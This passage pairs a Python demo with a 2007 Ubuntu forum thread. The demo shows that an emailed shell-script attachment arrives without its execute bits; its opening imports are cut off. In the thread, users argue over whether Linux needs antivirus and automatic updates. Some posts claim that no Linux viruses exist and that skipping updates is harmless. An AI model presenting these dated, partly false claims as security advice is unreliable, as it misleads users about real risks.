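import tempfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Constructed, harmless script used as the attachment body.
SCRIPT = b"#!/bin/sh\necho 'attachment ran'\n"


def exec_bits(path):
    """Return only the execute bits (user/group/other) of a file's mode."""
    return stat.S_IMODE(os.stat(path).st_mode) & 0o111


def try_run(path):
    """Run the file directly; report EACCES if the kernel refuses."""
    try:
        done = subprocess.run([path], capture_output=True, text=True, check=True)
        return done.stdout.strip()
    except PermissionError:
        return "EACCES"


def send_and_save(workdir):
    """Mail an executable script and save it on the receiving side."""
    # Sender: the script is executable on the sender's own disk.
    sender_copy = os.path.join(workdir, "sender_hello.sh")
    with open(sender_copy, "wb") as fh:
        fh.write(SCRIPT)
    os.chmod(sender_copy, 0o755)

    msg = EmailMessage()
    msg["From"] = "alice@example.org"
    msg["To"] = "bob@example.org"
    msg["Subject"] = "try this"
    msg.set_content("see attachment")
    with open(sender_copy, "rb") as fh:
        msg.add_attachment(fh.read(), maintype="application",
                           subtype="x-sh", filename="hello.sh")
    wire = msg.as_bytes()  # what actually travels: headers plus encoded bytes

    # Recipient: parse the message and write the attachment to disk.
    received = message_from_bytes(wire, policy=policy.default)
    part = next(received.iter_attachments())
    # basename() keeps a hostile filename from escaping the save directory.
    saved = os.path.join(workdir, "received_" + os.path.basename(part.get_filename()))
    with open(saved, "wb") as fh:  # new file gets 0666 masked by umask
        fh.write(part.get_content())
    return sender_copy, saved


def demo():
    with tempfile.TemporaryDirectory() as workdir:
        sender_copy, saved = send_and_save(workdir)
        with open(sender_copy, "rb") as a, open(saved, "rb") as b:
            same_bytes = a.read() == b.read()
        return {
            "sender_exec_bits": exec_bits(sender_copy),
            "saved_exec_bits": exec_bits(saved),
            "same_bytes": same_bytes,
            "run_saved": try_run(saved),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The saved copy is byte-for-byte identical to the sender's file, yet running it fails until the recipient deliberately sets the execute bit on it.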
Feba
June 4th, 2007, 08:40 AM
Ubuntu doesn't update for you, it just tells you when you have updates to install. Whether you consider it good or bad is mostly preference.
tweakedenigma
June 4th, 2007, 08:43 AM
I read the articles some people quoted. I understand better why linux is seemingly immune to viruses - although i wouldn't say i was convinced - yet. So i'll pick up on a different point i made - automatic updates. Microsoft discovered the hard way that people can't be trusted to update, and so turned it on by default in SP2. Now Ubuntu seems to be making that same 'mistake'. comments?
Well The Ubuntu update is a Large orange Icon that appears in the top task bar that tells you that there are updates, Now with windows I will mention that it still was not turned on by default it just asked and most people click yes as Windows people tend to do. I for one have done every Update that comes down the pipe simply because the Icon annoyed me.
mr_boo1711
June 4th, 2007, 09:01 AM
I find this whole topic really interesting. Gradually, I'm managing to detach myself from the Windows way of thinking (I am a newbie after all) - but this whole Linux not being a victim of viruses totally bewilders me (In a good way I might add). I did have big concerns over viruses (After all, I still don't know any better really) and this thread has helped me put that fear to the back of my mind.
I guess it's a risk you take for granted when using Windows, and it's an easy assumption to make that Linux will fall foul to the same fate sometimes. Is it purely the added security/admin restrictions on Linux that prevent it!? Just very good programming!? Is it the hackers dedication to annoying the hell out of Bill Gates!? lol - Either way I'm happy I guess... :)
I've only got a couple of things to straighten up on my Ubuntu OS and I will be as happy as larry!
Dylnuge
June 4th, 2007, 09:04 AM
You didn't answer my question though: Why is it not considered complacent to run without anti-virus?
If i were to install Ubuntu 7.04 on a relative's PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?
Simple. No viruses have been developed for Linux, and because of the way security works in Linux, it would be very difficult for one to do any real damage, such as using root privileges.
On the other hand, unauthorized access to your computer is possible. Instead of running AntiVirus, I would use Firestarter Firewall. Get it here: http://www.fs-security.com/.
TomMK
June 4th, 2007, 09:15 AM
Simple. No viruses have been developed for Linux
Now that's what I'm getting at. That statement is simply not true. But the sentiment is echoed by a number of posts i've read here - there's a confidence in Linux (given its excellent track record), and it seems to me like it's leading to arrogance, and thus to complacency among its users.
Statements like that are what leads me to question security in Linux in the first place.
Feba
June 4th, 2007, 09:24 AM
Just because some users are ignorant doesn't mean the OS is insecure. Well, it does in Windows, but not here. Viruses have of course been developed for every OS, the difference is that in *Nix systems, nobody has really been successful at spreading them. This is probably mostly because *nix is much more secure than windows, but also because *nix users are in general more cautious. How many times have you heard of someone ruining their Win* box by opening some random attachment or blindly following links? 99% of all *nix users are the kind of people that laugh at them, and the other 1% wouldn't know how to screw up their system if they tried.
The big thing that keeps linux safe is the fact that the source code is open. While this might seem like it's inviting hackers in to see your flaws, it really is a way for other people to point out flaws. Compare Windows, where only a small group of people ever see the code, to Linux, where hundreds and thousands of people can look at it, so that errors are eventually weeded out. This is well known as "The Cathedral and the Bazaar" models, because of a book about it, and as Linus's Law, which is something like "With enough eyes, all bugs are shallow."
It's been researched and proven that, on average, Open Source source code has many less errors per line of code than closed source.
BatsotO
June 4th, 2007, 09:41 AM
I run red hat router for 5 years now, yet no viruses.
ubuntu desktop for 2 years, zero virus.
surely there are viruses for linux, but
when you run anti virus, anti spy ware, auto update, firewall, it does not matter much when you use good hardware, maybe, but running without them is surely faster, not mentioning with old hardware, running them will slow the system down significantly, so it's not a good practice.
I left my 2004 ubuntu release un-updated, and it's still working pretty well now. It is not arrogance, but this is one of main advantages of using linux over windows. Surely updates are needed, but i'm a bit more lazy and less paranoid, so if it's not broken, i don't see any reason to fix it.
I dunno, maybe you feel that this is kind of too good to be true, but I use xp without any anti virus (you know how much a good anti virus costs?), and it only needs 30 minutes online for viruses to get to the system, compared with 2 years virus free ubuntu hoary ( you see I join this forum in 2005). All I can say is that you should experience by yourself, if some virus gets in your system, then fix 'em. It wouldn't kill you, it can be fun..
TomMK
June 4th, 2007, 10:00 AM
running them will slow the system down significantly, so it's not a good practice.
lol - what a quote. I'm keeping that one for when this all comes back to bite me.
quinnten83
June 4th, 2007, 10:05 AM
I have a question.
If you use the sudo command, aren't you installing as root?
In that case are you making changes to the entire system or still only to your account?
So if I seriously mess up, will I only mess up my account, and not that of the other users?
let's say I edit my xorg.conf.
That file is not in my home directory, but in a system directory. Did i screw it up for everybody?
Is there a way to guarantee security in this case? Cause if I work as root, I will always screw things up cause I have the authorization.
tweakedenigma
June 4th, 2007, 10:27 AM
Now that's what I'm getting at. That statement is simply not true. But the sentiment is echoed by a number of posts i've read here - there's a confidence in Linux (given its excellent track record), and it seems to me like it's leading to arrogance, and thus to complacency among its users.
Statements like that are what leads me to question security in Linux in the first place.
I would agree and dislike it when people make this comment as well because it is not true. Although I Think a better example would be the Linux Ipod Virus that was being talked about not too long ago and it was so hard to get the virus to work the way it was intended to that many people attempting to implement this Proof of Concept Virus just gave up.
In short it can be done but you gotta work really hard for it to work.
tweakedenigma
June 4th, 2007, 10:32 AM
I have a question.
If you use the sudo command, aren't you installing as root?
In that case are you making changes to the entire system or still only to your account?
So if I seriously mess up, will I only mess up my account, and not that of the other users?
let's say I edit my xorg.conf.
That file is not in my home directory, but in a system directory. Did i screw it up for everybody?
Is there a way to guarantee security in this case? Cause if I work as root, I will always screw things up cause I have the authorization.
Sudo Basically does make you Root for a short time but the idea is that it is only when you wish to change something system wide, As for Virus/Spyware they would need your password to Infect the whole system. The important thing is you are not always Root or Admin only when you tell the computer you need to be.
tompickles
June 4th, 2007, 11:18 AM
So, Linux viruses are very very rare. And the biggest issue is your system being compromised. How will being behind a router stop this?
Are people saying that a virus scanner is basically pointless as it will never find anything; so just update your box when you're asked to?
Maybe add a poll to see if people recommend a virus checker or not?!
wieman01
June 4th, 2007, 11:31 AM
First of all Linux/Unix viruses are extremely rare and most of the existing ones won't do any damage to a modern Unix-based operating system:
http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses
This explains why:
http://librenix.com/?inode=21
Third, you only need a virus scanner to possibly protect other Windows clients in your local network against potential spreading of viruses designed for Windows.
Last but not least, a firewall offers no protection against viruses at all. That's a common misconception.
So to conclude... you might consider a virus scanner but I have learned my lesson: You simply don't need them.
TomMK
June 4th, 2007, 11:34 AM
I think a poll would show that the majority of Linux users don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".
wieman01
June 4th, 2007, 11:40 AM
I think a poll would show that the majority of Linux users don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".
Get used to it. A user once told me that it is like wearing an umbrella in the desert (can't remember his name). And he was right. What harm can a virus do to you at this stage? Probably none at all. So why bother?
At some point this may change but I deem it very unlikely. Until then I am happy without an anti-virus program (although I have got one that I run once in a while - just in case).
phr0ze
June 4th, 2007, 11:45 AM
No one has mentioned that Virus scanners suck at finding viruses specifically not in their library and virus scanners even on linux only detect windows viruses because that's what is in the wild.
Basically if you run a virus scanner in linux it won't pick up a linux virus anyways at this point. And if a linux virus does come about, x number of people will be infected before it is properly discovered and guarded against. Then it WILL be in the news, and the community will most likely patch the hole before actually resorting to a virus scanner.
Running a virus scanner does not make you less vulnerable to a new linux virus.
oilchangeguy
June 4th, 2007, 11:47 AM
I think a poll would show that the majority of Linux users don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".
let's think about it like this. if you're one of the many idiots who write viruses, and wanna get the most bang for your buck, who are you going to target? well since 90%+ of the world's computers run a microsoft operating system, that seems like the place to be. going after the average un-tech savvy home computer user running windows with no anti-virus protection, or the copy of norton or mcafee that came pre-loaded on their computer and expired several years ago. or going after the very low installed base of mac and linux users?
RelativelyQuantum
June 4th, 2007, 11:49 AM
Are there any antivirus programs for Linux? I don't know of any.
oilchangeguy
June 4th, 2007, 11:51 AM
Are there any antivirus programs for Linux? I don't know of any.
Yep, there's several out there, go to Google and type in linux antivirus software, and see what comes up.
tweakedenigma
June 4th, 2007, 11:55 AM
Let's think about it like this. If you're one of the many idiots who write viruses, and wanna get the most bang for your buck, who are you going to target? Well, since 90%+ of the world's computers run a Microsoft operating system, that seems like the place to be. Going after the average un-tech-savvy home computer user running Windows with no anti-virus protection, or the copy of Norton or McAfee that came pre-loaded on their computer and expired several years ago. Or going after the very low installed base of Mac and Linux users?
I would argue this, based on the fact that the home user is not the only tasty target. Many, many high-end servers run on Linux and could do mass damage to a number of Windows people based on keeping them from needed services. Yet it is still not a major problem. So although I agree to a point, it is hardly the major factor.
tweakedenigma
June 4th, 2007, 11:56 AM
Are there any antivirus programs for Linux? I don't know of any.
AVG & Avast, to name 2. Both have Linux versions.
myoungf1
June 4th, 2007, 12:02 PM
I think a poll would show that the majority of Linux users don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".
If you are so concerned about viruses in Linux then I say go ahead and download and run a Linux antivirus software. When I first switched to Ubuntu I had the same concerns about viruses, and after being a faithful XP user I got used to being required to use security software to keep my XP safe. I went and got the free Linux AVG antivirus software and ran it about once a week. After getting more familiar with Ubuntu and doing some reading here in the forums I now rarely use it, as it's really a waste of time as no viruses are ever found. But if it does make you feel more comfortable, go ahead and get security software and use it, and hopefully over time you will get to the point I am at and not use it at all.